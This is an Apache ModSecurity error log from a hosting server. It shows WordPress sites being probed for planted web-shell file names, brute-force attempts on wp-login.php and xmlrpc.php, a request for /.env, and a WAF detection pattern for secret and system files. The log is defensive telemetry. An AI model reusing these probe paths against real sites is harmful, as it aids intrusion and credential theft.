[Tue May 26 20:03:01.892072 2026] [security2:error] [pid 106517:tid 106631] [remote 49.12.3.147:51332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWvHYZZc2DoU1lPnP17wAAAmG8"]
[Tue May 26 20:03:02.275825 2026] [security2:error] [pid 106517:tid 106693] [client 103.163.220.15:30351] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/backup.php"] [unique_id "ahWvHoZZc2DoU1lPnP17zQAAAK8"]
[Tue May 26 20:03:02.778002 2026] [security2:error] [pid 112029:tid 112274] [client 103.163.220.16:58149] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/widgets/class-wp-wolf-widget.php"] [unique_id "ahWvHqFW0C-ajaCsyFdCTgAAAX0"]
[Tue May 26 20:03:03.090849 2026] [security2:error] [pid 106517:tid 106672] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvHoZZc2DoU1lPnP173gAAAJs"]
[Tue May 26 20:03:03.264259 2026] [security2:error] [pid 106517:tid 106697] [client 103.163.220.12:48465] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wolf.php"] [unique_id "ahWvH4ZZc2DoU1lPnP179gAAALM"]
[Tue May 26 20:03:03.769223 2026] [security2:error] [pid 106517:tid 106761] [client 103.125.146.81:37617] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/postnews.php"] [unique_id "ahWvH4ZZc2DoU1lPnP18AwAAAPM"]
[Tue May 26 20:03:04.266124 2026] [security2:error] [pid 113091:tid 113292] [client 103.163.220.15:33935] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/maxro.php"] [unique_id "ahWvIKPxBGSmlFNOy6pJIgAAAls"]
[Tue May 26 20:03:04.577415 2026] [security2:error] [pid 106517:tid 106656] [client 147.90.234.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvIIZZc2DoU1lPnP18FwAAizI"], referer: https://kingsclub.in/feed
[Tue May 26 20:03:04.763495 2026] [security2:error] [pid 106517:tid 106677] [client 103.163.220.20:29665] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/akismet/_inc/img/PRffc.php"] [unique_id "ahWvIIZZc2DoU1lPnP18IgAAAKA"]
[Tue May 26 20:03:05.272816 2026] [security2:error] [pid 113091:tid 113268] [client 103.163.220.23:50315] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/wpvivid_uploads/wp-conflg.php"] [unique_id "ahWvIaPxBGSmlFNOy6pJOAAAAkM"]
[Tue May 26 20:03:05.417500 2026] [security2:error] [pid 106517:tid 106714] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvIIZZc2DoU1lPnP18KwAAAMQ"]
[Tue May 26 20:03:05.777756 2026] [security2:error] [pid 106517:tid 106748] [client 103.163.220.6:43037] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/fukasawa/inc/classes/eroor.php"] [unique_id "ahWvIYZZc2DoU1lPnP18QAAAAOY"]
[Tue May 26 20:03:06.270116 2026] [security2:error] [pid 112029:tid 112214] [client 103.163.220.31:36903] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/btx25.php"] [unique_id "ahWvIqFW0C-ajaCsyFdCgAAAAUE"]
[Tue May 26 20:03:06.565345 2026] [security2:error] [pid 112029:tid 112174] [client 74.7.244.7:55356] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.adityacreations.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWvIqFW0C-ajaCsyFdCggABGTg"]
[Tue May 26 20:03:06.760750 2026] [security2:error] [pid 106517:tid 106676] [client 103.163.220.6:53515] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/users.php"] [unique_id "ahWvIoZZc2DoU1lPnP18VwAAAJ8"]
[Tue May 26 20:03:07.264393 2026] [security2:error] [pid 112029:tid 112274] [client 103.163.220.43:46049] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/yosxb.php"] [unique_id "ahWvI6FW0C-ajaCsyFdCiQAAAX0"]
[Tue May 26 20:03:07.767715 2026] [security2:error] [pid 106517:tid 106667] [client 103.163.220.25:29253] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/wp-cache-sys/class-payment.php"] [unique_id "ahWvI4ZZc2DoU1lPnP18hQAAAJY"]
[Tue May 26 20:03:08.094498 2026] [security2:error] [pid 112029:tid 112255] [client 45.154.98.38:63491] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWvJKFW0C-ajaCsyFdCjAAAAWo"]
[Tue May 26 20:03:08.094655 2026] [security2:error] [pid 112029:tid 112255] [client 45.154.98.38:63491] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWvJKFW0C-ajaCsyFdCjAAAAWo"]
[Tue May 26 20:03:08.262306 2026] [security2:error] [pid 112029:tid 112205] [client 103.163.220.41:42569] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/block-patterns/chosen.php"] [unique_id "ahWvJKFW0C-ajaCsyFdCjgAAATg"]
[Tue May 26 20:03:08.391243 2026] [security2:error] [pid 106517:tid 106708] [client 45.154.98.38:56938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWvJIZZc2DoU1lPnP18pAAAAL4"]
[Tue May 26 20:03:08.391325 2026] [security2:error] [pid 106517:tid 106708] [client 45.154.98.38:56938] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWvJIZZc2DoU1lPnP18pAAAAL4"]
[Tue May 26 20:03:08.613577 2026] [security2:error] [pid 113091:tid 113302] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvJKPxBGSmlFNOy6pJUAAAAmU"]
[Tue May 26 20:03:08.763607 2026] [security2:error] [pid 106517:tid 106758] [client 103.163.220.18:24179] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/column/classwithtostring.php"] [unique_id "ahWvJIZZc2DoU1lPnP18uAAAAPA"]
[Tue May 26 20:03:09.274726 2026] [security2:error] [pid 106517:tid 106697] [client 103.163.220.50:42567] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/parts/"] [unique_id "ahWvJYZZc2DoU1lPnP18zQAAALM"]
[Tue May 26 20:03:09.292427 2026] [security2:error] [pid 106517:tid 106763] [client 185.191.171.5:54860] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWvJYZZc2DoU1lPnP18zgAAAPU"]
[Tue May 26 20:03:09.292562 2026] [security2:error] [pid 106517:tid 106763] [client 185.191.171.5:54860] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWvJYZZc2DoU1lPnP18zgAAAPU"]
[Tue May 26 20:03:09.768663 2026] [security2:error] [pid 106517:tid 106658] [client 192.42.116.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvJYZZc2DoU1lPnP182gAAjSs"], referer: https://kingsclub.in/fitness-dance-studio
[Tue May 26 20:03:09.778502 2026] [security2:error] [pid 113091:tid 113261] [client 103.163.220.34:26823] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/wp-cache-sys/file.php"] [unique_id "ahWvJaPxBGSmlFNOy6pJXwAAAjw"]
[Tue May 26 20:03:10.264879 2026] [security2:error] [pid 113091:tid 113257] [client 103.163.220.27:34225] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/chillbud/inc/content/templates/"] [unique_id "ahWvJqPxBGSmlFNOy6pJaQAAAjg"]
[Tue May 26 20:03:10.619420 2026] [security2:error] [pid 113091:tid 113300] [client 104.248.202.196:58172] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahWvJqPxBGSmlFNOy6pJcgAAAmM"]
[Tue May 26 20:03:10.681502 2026] [security2:error] [pid 106517:tid 106679] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvJoZZc2DoU1lPnP187QAAAKE"]
[Tue May 26 20:03:10.980602 2026] [security2:error] [pid 106517:tid 106766] [client 103.163.220.21:30165] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/revslider/admin/assets/js/plugins/admin.php"] [unique_id "ahWvJoZZc2DoU1lPnP19AAAAAPg"]
[Tue May 26 20:03:11.009573 2026] [security2:error] [pid 106517:tid 106760] [client 104.248.202.196:57512] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahWvJ4ZZc2DoU1lPnP19AgAAAPI"]
[Tue May 26 20:03:11.190722 2026] [security2:error] [pid 106517:tid 106595] [remote 50.6.207.27:55330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvJ4ZZc2DoU1lPnP19BAAAmEs"]
[Tue May 26 20:03:11.506510 2026] [security2:error] [pid 106517:tid 106741] [client 103.163.220.46:43313] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/wp-load.php"] [unique_id "ahWvJ4ZZc2DoU1lPnP19FwAAAN8"]
[Tue May 26 20:03:12.216436 2026] [security2:error] [pid 106517:tid 106705] [client 176.65.139.233:45898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mtm117.eu"] [uri "/.env"] [unique_id "ahWvKIZZc2DoU1lPnP19MAAAALs"]
[Tue May 26 20:03:12.276063 2026] [security2:error] [pid 113091:tid 113340] [client 103.163.220.35:53191] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/js_composer/assets/lib/bower/vcIconPicker/themes/xmlrpc.php"] [unique_id "ahWvJ6PxBGSmlFNOy6pJfgAAAos"]
[Tue May 26 20:03:12.295803 2026] [security2:error] [pid 106517:tid 106720] [client 192.42.116.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvKIZZc2DoU1lPnP19LQAAyjc"], referer: https://kingsclub.in/gym
[Tue May 26 20:03:12.778399 2026] [security2:error] [pid 112029:tid 112226] [client 103.163.220.44:23031] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/js_composer/assets/lib/bower/nivoslider/themes/module.php"] [unique_id "ahWvKKFW0C-ajaCsyFdCmwAAAU0"]
[Tue May 26 20:03:13.114765 2026] [security2:error] [pid 106517:tid 106612] [remote 50.6.207.27:55330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvKYZZc2DoU1lPnP19UgAA9lw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:03:13.268252 2026] [security2:error] [pid 113091:tid 113270] [client 103.163.220.52:55345] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sodium_compat/wp-conflg.php"] [unique_id "ahWvKaPxBGSmlFNOy6pJlwAAAkU"]
[Tue May 26 20:03:13.685326 2026] [security2:error] [pid 113091:tid 113348] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvKaPxBGSmlFNOy6pJlgAAApM"]
[Tue May 26 20:03:13.761210 2026] [security2:error] [pid 106517:tid 106681] [client 103.163.220.27:56351] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/js_composer/include/classes/vendors/plugins/login.php"] [unique_id "ahWvKYZZc2DoU1lPnP19bAAAAKM"]
[Tue May 26 20:03:14.262654 2026] [security2:error] [pid 106517:tid 106778] [client 103.163.220.17:47385] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/themes/api.php"] [unique_id "ahWvKoZZc2DoU1lPnP19fgAAAQQ"]
[Tue May 26 20:03:14.765880 2026] [security2:error] [pid 112029:tid 112211] [client 103.163.220.54:39145] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/plugins/wp-load.php"] [unique_id "ahWvKqFW0C-ajaCsyFdCpAAAAT4"]
[Tue May 26 20:03:15.259482 2026] [security2:error] [pid 113091:tid 113255] [client 103.163.220.48:58567] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/js_composer/include/classes/vendors/plugins/users.php"] [unique_id "ahWvK6PxBGSmlFNOy6pJqgAAAjY"]
[Tue May 26 20:03:15.374546 2026] [security2:error] [pid 112029:tid 112088] [remote 119.18.52.246:43022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWvK6FW0C-ajaCsyFdCrAABIjo"]
[Tue May 26 20:03:16.003769 2026] [security2:error] [pid 106517:tid 106701] [client 103.163.220.25:30865] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/js_composer/assets/js/frontend_editor/vendors/plugins/xmlrpc.php"] [unique_id "ahWvK4ZZc2DoU1lPnP19rwAAALc"]
[Tue May 26 20:03:16.124291 2026] [security2:error] [pid 106517:tid 106590] [remote 49.12.3.147:36872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWvLIZZc2DoU1lPnP19vQAA3EY"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 20:03:16.299351 2026] [security2:error] [pid 106517:tid 106774] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvK4ZZc2DoU1lPnP19tgAAAQA"]
[Tue May 26 20:03:16.493480 2026] [security2:error] [pid 113091:tid 113266] [client 103.163.220.19:41517] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/js_composer/assets/lib/vc_chart/"] [unique_id "ahWvLKPxBGSmlFNOy6pJxQAAAkE"]
[Tue May 26 20:03:16.815199 2026] [security2:error] [pid 112029:tid 112089] [remote 119.18.52.246:43022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWvLKFW0C-ajaCsyFdCtQABCjs"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 20:03:16.982797 2026] [security2:error] [pid 112029:tid 112222] [client 103.163.220.10:24839] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/codemirror/"] [unique_id "ahWvLKFW0C-ajaCsyFdCugAAAUk"]
[Tue May 26 20:03:17.251552 2026] [security2:error] [pid 113091:tid 113270] [client 107.189.7.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvLaPxBGSmlFNOy6pJzQACRTg"], referer: https://kingsclub.in/indoor-party-hall
[Tue May 26 20:03:17.471177 2026] [security2:error] [pid 113091:tid 113329] [client 103.163.220.37:27835] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/js_composer/assets/lib/vc_chart/about.php"] [unique_id "ahWvLaPxBGSmlFNOy6pJ1AAAAoA"]
[Tue May 26 20:03:18.178428 2026] [security2:error] [pid 112029:tid 112263] [client 103.163.220.17:27571] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/monolog/monolog/about.php"] [unique_id "ahWvLqFW0C-ajaCsyFdCxAAAAXI"]
[Tue May 26 20:03:18.668395 2026] [security2:error] [pid 106517:tid 106749] [client 103.163.220.23:60047] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/essential-grid/public/assets/font/fontello/css/about.php"] [unique_id "ahWvLoZZc2DoU1lPnP1-GwAAAOc"]
[Tue May 26 20:03:18.794925 2026] [security2:error] [pid 106517:tid 106771] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvLoZZc2DoU1lPnP1-BQAAAP0"]
[Tue May 26 20:03:19.167520 2026] [security2:error] [pid 106517:tid 106739] [client 103.163.220.47:25013] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/yosxb.php"] [unique_id "ahWvL4ZZc2DoU1lPnP1-NAAAAN0"]
[Tue May 26 20:03:19.664720 2026] [security2:error] [pid 112029:tid 112171] [client 103.163.220.48:44973] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/block-supports/222.php"] [unique_id "ahWvL6FW0C-ajaCsyFdCyAAAARY"]
[Tue May 26 20:03:20.162092 2026] [security2:error] [pid 106517:tid 106715] [client 103.163.220.23:23791] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/css/dist/block-directory/"] [unique_id "ahWvMIZZc2DoU1lPnP1-VQAAAMU"]
